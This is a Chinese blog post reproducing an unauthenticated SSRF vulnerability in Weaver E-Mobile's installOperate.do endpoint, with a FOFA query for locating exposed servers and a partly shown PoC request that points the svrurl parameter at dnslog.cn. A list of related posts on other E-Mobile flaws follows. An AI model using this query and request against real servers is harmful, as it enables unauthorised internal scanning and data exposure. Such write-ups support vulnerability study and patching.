泛微E-Mobile installOperate.do SSRF漏洞复现

已于 2024-07-23 18:23:39 修改
阅读量2.7k 收藏
点赞数 1
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
于 2024-07-23 18:22:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41904294/article/details/140643052
版权

0x01 产品简介

泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列功能和工具,使企业员工能够通过移动设备随时随地进行办公和协作。

0x02 漏洞概述

泛微E-Mobile installOperate.do 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。

0x03 复现环境

FOFA:header="EMobileServer"

0x04 漏洞复现

PoC

GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macin
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0day蓝凌EIS智慧协同平台 Message SQL注入漏洞
ZeroDay001的博客
01-09 189
瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞这是一个集内容管理与发布于一体的智能平台,广服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
E-Mobile 6.0存在命令执行漏洞
xiaokp7的博客
07-30 1802
E-Mobile 6.0爆出存在命令执行漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
未公开 0D E-Office E-mobile/App文件上传漏洞
ZeroDay001的博客
02-22 156
E-Office E-mobile/App文件上传漏洞这是一个集内容管理与发布于一体的智能平台,广服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
漏洞复现e-Mobile 移动管理平台文件上传漏洞
qq_34780861的博客
04-25 3944
e-Mobile移动管理平台是一款由软件开发的企业移动办公解决方案。它提供了一系列的功能和工具,使企业员工能够通过移动设备随时随地地进行办公和协作。e-Mobile 移动管理平台存在任意文件上传漏洞
移动平台e-mobile漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-14 8780
移动平台e-mobile漏洞利用基本信息 漏洞情报编号:vulbox-intel-15244 是否可自动化组件:是 CVE-ID:暂无 发布日期:2022/04/01 15:48:45 CNNVD-ID:暂无 最新更新时间:2022/04/08 18:02:59 CNVD-ID:CNVD-2017-02376
E-Mobile /client.do 命令执行漏洞复现
0xSec
04-04 2822
E-Mobile存在命令执行漏洞,攻击者可以通过/client.do执行任意命令执行,从而获得服务器权限。
【1day】复现E-Mobile 6.0 存在命令执行漏洞
记录并分享学习安全的知识点..
07-21 1464
E-Mobile一款由上海网络科技股份有限公司开发的移动办公产品,专门为手机、平板电脑等移动终端用户打造的移动办公产品。E-Mobile 6.0 版本存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
漏洞复现-EMobile存在弱口令漏洞
qq_34780861的博客
03-19 7526
-EMobile存在默认口令,攻击者可能通过尝试弱口令,非法进入系统,恶意操作或者收集信息进一步攻击利用。
e-cology getFileViewUrl接口存在SSRF漏洞复现 [附POC]
薛定谔嘚喵博客
07-11 1494
E-Cology getFileViewUrl接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
E-mobile installOperate.do ssrf复现
iSee857的博客
09-26 519
E-Mobile installOperate.do 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。e-Mobile移动管理平台是一款由软件开发的企业移动办公解决方案。它提供了一系列功能和工具,使企业员工能够通过 移动设备随时随地进行办公和协作。目前官方已发布安全补丁,建议受影响用户尽快升级至安全版本。
E-Cology WorkflowServiceXml SQL注入漏洞复现(QVD-2024-26136)
0xSec
07-12 2377
2024年7月,官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞
E-Mobile 硬编码口令漏洞复现(XVE-2024-28095)
0xSec
09-26 2563
E-Mobile 存在硬编码口令漏洞,未经身份验证的远程攻击者可利用该口令以超级管理员身份登录管理后台,导致网站处于极度不安全状态。
E-Mobile 6.0命令执行漏洞
故事讲予风听
11-10 1855
E-Mobile 6.0存在命令执行漏洞的问题,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
移动管理平台E-mobile lang2sql接口任意文件上传漏洞
CommputerMac的博客
11-07 6445
e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。e-mobile,由高端OA专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业信等丰富办公应用,支持多种平台运行,灵活易用安全性高。
e-Mobile移动管理平台 error 远程命令执行漏洞复现
iSee857的博客
11-01 1023
E-Mobile基于成熟产品e-cology,它将协同OA上的公文、流程、通讯录、日程、文件管理、通知公告等应用扩展到手机移动终端,为用户提供更方便更灵活的移动办公应用。移动OA对突发性事件和紧急性事件的处理有极其高效和出色的支持,是管理者、销售人员等经常有外出办公、出差需求的商务人士的贴心的掌上办公产品,适合于已有内部OA系统的大中型企业机构,尤其是企业或部门有较多的分支机构。Fofa:app="-EMobile"厂商已发布补丁 请即时修复。
最新漏洞汇总----实时更新!!!
yggcwhat
07-31 9226
最新漏洞汇总
E-Mobile 口令硬编码漏洞复现
iSee857的博客
09-29 1318
E-Mobile基于成熟产品e-cology,它将协同OA上的公文、流程、通讯录、日程、文件管理、通知公告等应用扩展到手机移动终端,为用户提供更方便更灵活的移动办公应用。移动OA对突发性事件和紧急性事件的处理有极其高效和出色的支持,是管理者、销售人员等经常有外出办公、出差需求的商务人士的贴心的掌上办公产品,适合于已有内部OA系统的大中型企业机构,尤其是企业或部门有较多的分支机构。Fofa:app="-EMobile"
【1day】复现E-Mobile 6.6 存在命令执行漏洞
记录并分享学习安全的知识点..
08-14 2485
E-Mobile一款由上海网络科技股份有限公司开发的移动办公产品,专门为手机、平板电脑等移动终端用户打造的移动办公产品。E-Mobile 6.6 版本存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
E-Mobile 6.0远程命令执行漏洞
薛定谔嘚喵博客
08-22 1425
E-Mobile 6.0被爆存在漏洞命令执行。现已确认该漏洞可被攻击者利用,攻击者可通 过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令去执行,从而获取服 务器的执行权限。
E-Mobile-client.do存在命令执行漏洞测试背景
最新发布
03-29
嗯,用户想了解E-Mobile的client.do命令执行漏洞的测试背景、测试方法、形成原因和安全修复措施。首先,我需要回忆一下之前提供的引用内容,看看里面有没有相关的信息。引用1和引用2提到了漏洞存在,攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值